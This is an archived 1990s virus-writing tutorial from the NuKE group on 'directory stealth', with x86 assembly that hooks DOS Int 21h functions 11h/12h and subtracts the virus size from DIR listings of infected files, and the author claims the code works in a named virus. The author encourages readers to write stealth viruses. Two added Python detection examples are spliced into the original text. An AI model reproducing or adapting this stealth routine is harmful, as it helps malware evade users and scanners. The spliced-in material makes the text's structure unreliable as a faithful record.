💾 Archived View for spam.works › mirrors › textfiles › virus › rstut007.txt captured on 2023-06-16 at 21:04:27.


                          
                     *****************************    
                     **   Directory Stealth     **                              
                     **                         **                              
                     **   By Rock Steady/NuKE   ** 
                     *****************************

  Stealth Viruses are the Viruses that I must admit Anti-Viral people
  don't tend to like at all. Imagine if we added a Polymorphic feature into
  the Stealth Virus? But, if you want to Continue Writing Viruses you have
  to make them Stealth. MS-DOS Version 6.0 now comes with Virus Scanners
  and CRC & Checksum Checkers in order to stop many viruses, But it will
  NEVER stop the `Stealth' Virus that is SMART about those AV features!
                                                                           
  People think that there are A LOT more INFECTED PCs since the virus
  threat started in 1986-7. Even though in the beginning only 10 or so
  viruses were known, they Infected more systems, Compared to the viruses
  today, where we have about 1300 and growing. But the truth is FEWER PCs
  are getting infected now, as people are now Virus Aware. With all the
  utilities out, any joker can stop and clean a virus in seconds. Come
  on, how many people MEMORIZED the COMMAND.COM size? Out of my head it's
  47845 (MS-DOS V5.0). A simple increase in size tells me I've got a problem.
                                                                           
  A simple Stealth Feature every virus MUST have is the DOS `Dir' Stealth
  feature, which will NOT show you the INCREASE in file size when the
  virus infects it. I have played with a few routines as such. I have
  tried reducing the File size in the FAT area, which results in the
  famous CHKDSK error reports of Lost Sectors or Cross Links... And
  fixing them with CHKDSK will result in damaging the file for good.

  What can we do? How about reducing the File size right AFTER it's read
  by DOS or any Utilities and right BEFORE it's displayed on the screen!
  Yeah, that's an Idea. Here's how to go about it...
                                                                           
  %Theory%                                                                 
  ~~~~~~~~                                                                 
  First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h
  functions 11h & 12h are called! If you don't know how to Hook Interrupts,
  Read the RESIDENT VIRIIs Article in this NewsLetter.
                                                                           
   Int21_Handler:
          cmp     ah,11h                  ;Is a DOS `Dir' (Find First FCB) being done?
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'
          cmp     ah,12h                  ;Is a DOS `Dir' (Find Next FCB) being done?
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'

  Int21Call:
          jmp     dword ptr cs:[Int21]    ;Or Else Goto ORIGINAL Int 21h
          ret                             ;Needed for the CALL from `dir_stealth' below
                                                                           
  That's all that is needed in your Int21_Handler. Of course, if you are
  infecting files that are being Executed you add that check ABOVE! Anyhow, let's
  Explain the `DIR_STEALTH'.
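  The defender's counterpart to the hook above, as an added example written for
  this edition (it is not part of the original article or of any NuKE code): an
  analyst who suspects a resident Int 21h hook compares a dump of the interrupt
  vector table taken from a clean boot against one taken on the running system,
  and flags watched vectors that moved, especially ones that now point above the
  DOS kernel area where a memory-resident program would sit. The two IVT images
  and all segment:offset values below are constructed for the example; the
  Python tooling and the 0x1000 segment limit are assumptions, not anything the
  article specifies.

```python
import struct

IVT_SIZE = 1024                       # 256 vectors * 4 bytes (offset word, then segment word)
WATCHED = (0x13, 0x21, 0x24, 0x28)    # disk, DOS services, critical error, DOS idle

def build_ivt(vectors):
    """Build a raw IVT image from {int_number: (segment, offset)}; unset entries stay 0000:0000.
    Used here only to construct the sample snapshots."""
    table = bytearray(IVT_SIZE)
    for num, (seg, off) in vectors.items():
        struct.pack_into('<HH', table, num * 4, off, seg)
    return bytes(table)

def parse_ivt(image):
    """Return 256 (segment, offset) pairs from a raw 1024-byte IVT image."""
    if len(image) != IVT_SIZE:
        raise ValueError('IVT image must be exactly 1024 bytes')
    vectors = []
    for n in range(256):
        off, seg = struct.unpack_from('<HH', image, n * 4)
        vectors.append((seg, off))
    return vectors

def format_vector(vec):
    seg, off = vec
    return f'{seg:04X}:{off:04X}'

def changed_vectors(baseline, current, watch=WATCHED):
    """Report watched interrupts whose vector differs between the two snapshots."""
    base, cur = parse_ivt(baseline), parse_ivt(current)
    return [{'int': n, 'before': base[n], 'after': cur[n]} for n in watch if base[n] != cur[n]]

def points_above(vec, seg_limit):
    """True if the vector's segment lies above seg_limit, i.e. outside the low DOS kernel
    area and in the region where a resident program would have been loaded."""
    return vec[0] > seg_limit

# Constructed snapshots: every segment/offset value here is invented for the example.
CLEAN_VECTORS = {0x13: (0x0070, 0x0A2E), 0x21: (0x0116, 0x10D8),
                 0x24: (0x0116, 0x0F8A), 0x28: (0x0116, 0x10DE)}
BASELINE_IVT = build_ivt(CLEAN_VECTORS)
HOOKED_IVT = build_ivt({**CLEAN_VECTORS, 0x21: (0x9F80, 0x0103)})   # Int 21h redirected high

def report(baseline=BASELINE_IVT, current=HOOKED_IVT, dos_limit=0x1000):
    """One line per moved vector, marking those that now point above the DOS area."""
    lines = []
    for f in changed_vectors(baseline, current):
        flag = ' (now points above DOS area)' if points_above(f['after'], dos_limit) else ''
        lines.append(f"INT {f['int']:02X}h: {format_vector(f['before'])} -> {format_vector(f['after'])}{flag}")
    return lines

if __name__ == '__main__':
    print('\n'.join(report()) or 'no watched vector changed')
```

  A moved vector is not proof of infection on its own, since legitimate TSRs hook
  Int 21h too; the value of the check is the diff against a known-clean baseline,
  which is why the snapshot should come from a clean boot.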
                                                                           
  Offset  Size   Description
    ------------------[Normal FCB]---------------------------------------
    00h |  1  |  Drive Number 00=current drive 01=A,02=B,03=C etc..
    01h |  8  |  Filename. Unused Spaces padded with Blanks
    09h |  3  |  Extension of Filename.
    0Ch |  2  |  Current block. points to block of records
    0Eh |  2  |  Record Size.
    10h |  4  |  FileSize in Bytes. (Low-order first, then high-order)
    14h |  2  |  Date of Last Write. YY-MM-DD into bits YYYY-YYYM-MMMD-DDDD
    16h |  2  |  Time of Last Write. HH:MM:SS into bits HHHH-HMMM-MMMS-SSSS
    18h |  4  |  Reserved
   *1Ch |  4  |  SAME as `10h' but THIS FILESIZE gets printed on Screen!
    20h |  1  |  Offset of current record
    21h |  4  |  Relative Record

  * = Field Changed by virus.
                                                                           
  Extended FCB: Is identical to the Normal FCB but it has three new
  ~~~~~~~~~~~~  fields totalling 7 bytes. (That is why we add 7 to BX)
                The additional 7 bytes are added to the BEGINNING!
                                                                           
                                                                           
  Offset  Size   Description
    ------------------[Extended FCB]-------------------------------------
   -07h |  1  |  ALWAYS FFh, tells us this is an Extended FCB
   -06h |  5  |  Reserved for DOS
   -01h |  1  |  Attribute Byte
                                                                           
  So if we have an Extended FCB the first Byte will be FFh: simply INC it,
  and if it's ZERO you've got an Extended FCB! You can also CMP ES:[BX],FFh
  but that takes too many Bytes! Be COMPACT!!!
                                                                           
 %Algorithms%                                                              
 ~~~~~~~~~~~~                                                              
 CONDITION: After calling Function 11h/12h (Int 21h), DOS will
       search using the contents of the FCB (e.g. *.*) that the DS:DX
       registers point to. If successful it will DUPLICATE
       the specified fields of the FCB in the current DTA (Disk Transfer Area),
       And basically we will EDIT the info in the DTA!
 NOTE: Just because we are using the DTA doesn't mean this will work for
       functions 4Eh/4Fh (Int 21h), which use the DTA and ASCIIZ strings to
       search; that is a different procedure, though somewhat the same as
       this one. See Method #2 for that.
                                                                           
   Step 1. We call the Int 21h so we may have the results to play with
           BEFORE DOS displays them on screen.
   Step 2. Get the Current PSP, as the FCB is located inside the PSP;
           in COM files it's CS:0000 - CS:00FF, but in EXEs it can be any-
           where. Int 21h/AH=51h (Undocumented) will do this for us.
   Step 3. Unmask the seconds (see if it's infected). Quit if NOT.
   Step 4. Get the current DTA.
   Step 5. Test if it is Either an Extended FCB or Normal! If Extended,
           simply add 7h to the Address. (As Extended FCBs only have 7 bytes
           extra at the beginning)
   Step 6. Subtract the virus size from the File size in the DTA & Restore the Time Back.
                                                                           
 ; Here it is... Method #1                                                 
                                                                           
   dir_stealth:
          pushf                   ;Fake an INT Call
          push    cs              ;Needed to return back HERE! (Virus)
          call    Int21Call       ;Call the interrupt (See `Int21_Handler')
          test    al,al           ;AL=00h if successful
          jnz     no_good         ;Not Successful. Errors Eg: No More Files

          push    ax
          push    bx      ;Save them since they will be used! So when
          push    es      ;We exit all is restored to as Before!
          mov     ah,51h  ;(Undocumented) Gets the Current PSP and puts
          int     21h     ;it into BX

          mov     es,bx         ;ES now has PSP segment Address
          cmp     bx,es:[16h]   ;Did we open a Good PSP?
          jnz     not_infected  ;No, PSP unavailable, restore registers and Exit
          mov     bx,dx         ;BX now points to the Original FCB in PSP
          mov     al,[bx]       ;AL now has the current drive (or FFh)
          push    ax            ;Save it to tell if it's an Extended FCB
          mov     ah,2fh        ;Get DTA (Disk Transfer Address) into ES:BX
          int     21h
  ;Also before we start fiddling around we must know if we are working with
  ;an EXTENDED FCB or the Normal FCB, or else Major Problems! The Extended
  ;has three fields prepended to the normal one... (Above)

          pop     ax            ; AL = FFh if Extended FCB or else Drive #
          inc     al            ; Zero now means we have an Extended FCB
          jnz     fcb_ok        ; Not Extended, continue as normal
          add     bx,7h         ; Extended, so skip the 7-byte prefix
  fcb_ok: mov     ax,es:[bx+17h]  ;Gets the Time field (Seconds in low 5 bits)
          and     ax,1fh          ;Unmask to have SECONDS only
          xor     al,1dh          ;is it 58 seconds? (1dh * 2)
          jnz     not_infected    ;Nope, okay it's not infected
          and     byte ptr es:[bx+17h],0e0h   ;Restores seconds to zero
          sub     es:[bx+1dh],virus_size      ;Subtract the virus size from the FileSize (low word)
          sbb     es:[bx+1fh],ax              ;AX is zero here, so this just fixes up the
  not_infected:                               ;high word with the borrow
          pop     es              ;Ciao, Ciao
          pop     bx
          pop     ax
  no_good:iret             ;Pretend you came back from an Interrupt call!
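  For the defender's side of the same structures, here is an added example (it is
  not from the article, nor from NuKE PoX): it parses the find-first/find-next
  result as the routine above reads it from the DTA, that is the drive byte
  followed by the 32-byte directory entry, with the 7-byte prefix in front when
  an extended FCB was used, so the Time word sits at 17h and the size at 1Dh
  relative to the drive byte. It decodes the packed date and time, flags the
  58-second timestamp marker the routine checks for, and compares sizes from a
  DIR on the running system against sizes obtained from a clean boot or raw
  directory sectors, which is how hidden growth shows up. All sample entries are
  constructed; 47845 is the COMMAND.COM size the article quotes, and the
  1234-byte virus size is an invented placeholder.

```python
import struct

MARKER_SECONDS = 58   # the seconds value (1Dh * 2) the article's routine treats as "already infected"

def encode_dos_time(h, m, s):
    return (h << 11) | (m << 5) | (s // 2)

def encode_dos_date(y, mo, d):
    return ((y - 1980) << 9) | (mo << 5) | d

def decode_dos_time(word):
    """Packed DOS time: HHHHH MMMMMM SSSSS, seconds stored halved."""
    return (word >> 11) & 0x1F, (word >> 5) & 0x3F, (word & 0x1F) * 2

def decode_dos_date(word):
    """Packed DOS date: YYYYYYY MMMM DDDDD, year relative to 1980."""
    return 1980 + ((word >> 9) & 0x7F), (word >> 5) & 0x0F, word & 0x1F

def build_find_result(name, ext, attr, hms, ymd, size, extended=False, drive=3):
    """Construct what DOS leaves in the DTA after FCB find-first/next (sample data only)."""
    entry = (name.ljust(8).encode('ascii') + ext.ljust(3).encode('ascii') + bytes([attr]) + bytes(10)
             + struct.pack('<HHHI', encode_dos_time(*hms), encode_dos_date(*ymd), 2, size))
    prefix = b'\xFF' + bytes(5) + bytes([attr]) if extended else b''
    return prefix + bytes([drive]) + entry

def parse_find_result(dta):
    """Parse the DTA after Int 21h fn 11h/12h: an optional 7-byte extended-FCB prefix
    (FFh, 5 reserved, attribute), then the drive byte, then the 32-byte directory entry.
    Within the entry, time is at +22, date at +24, first cluster at +26, size at +28."""
    offset = 7 if dta[0] == 0xFF else 0
    entry = bytes(dta[offset + 1: offset + 33])
    if len(entry) != 32:
        raise ValueError('truncated find result')
    name = entry[0:8].decode('ascii').rstrip()
    ext = entry[8:11].decode('ascii').rstrip()
    time_word, date_word, cluster, size = struct.unpack_from('<HHHI', entry, 22)
    return {'extended': offset == 7, 'drive': dta[offset], 'name': f'{name}.{ext}' if ext else name,
            'attr': entry[11], 'time': decode_dos_time(time_word), 'date': decode_dos_date(date_word),
            'cluster': cluster, 'size': size}

def infection_marker_present(parsed):
    """A seconds field of 58 is the mark the routine looks for before hiding the size."""
    return parsed['time'][2] == MARKER_SECONDS

def size_discrepancies(listing_sizes, reference_sizes):
    """Sizes from a DIR on the running (possibly hooked) system versus sizes from a clean
    source; any file whose two sizes differ is returned with both values."""
    return {n: (listing_sizes[n], reference_sizes[n])
            for n in listing_sizes if n in reference_sizes and listing_sizes[n] != reference_sizes[n]}

# Constructed samples: invented timestamps, and an invented 1234-byte virus size.
VIRUS_SIZE = 1234
SAMPLE_DTA = build_find_result('COMMAND', 'COM', 0x20, (13, 5, 58), (1991, 11, 11),
                               47845 + VIRUS_SIZE, extended=True)
CLEAN_DTA = build_find_result('README', 'TXT', 0x20, (9, 30, 14), (1992, 1, 2), 1024)

if __name__ == '__main__':
    for dta in (SAMPLE_DTA, CLEAN_DTA):
        p = parse_find_result(dta)
        print(p['name'], p['size'], p['time'], 'MARKER' if infection_marker_present(p) else 'clean')
    print(size_discrepancies({'COMMAND.COM': 47845}, {'COMMAND.COM': 47845 + VIRUS_SIZE}))
```

  The 58-second check is the cheap heuristic (a few clean files will carry that
  timestamp by chance); the size comparison against a clean-boot listing is the
  reliable one, because the hook only edits what the infected system reports,
  not what is on disk.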
  ;----------------------------The EnD-------------------------------------
                          Rock Steady / NuKE                               
                 `Feed my Frankenstein', Alice Cooper                      
  NOTE: This Code Works, Look at NuKE PoX V1.1 to see it...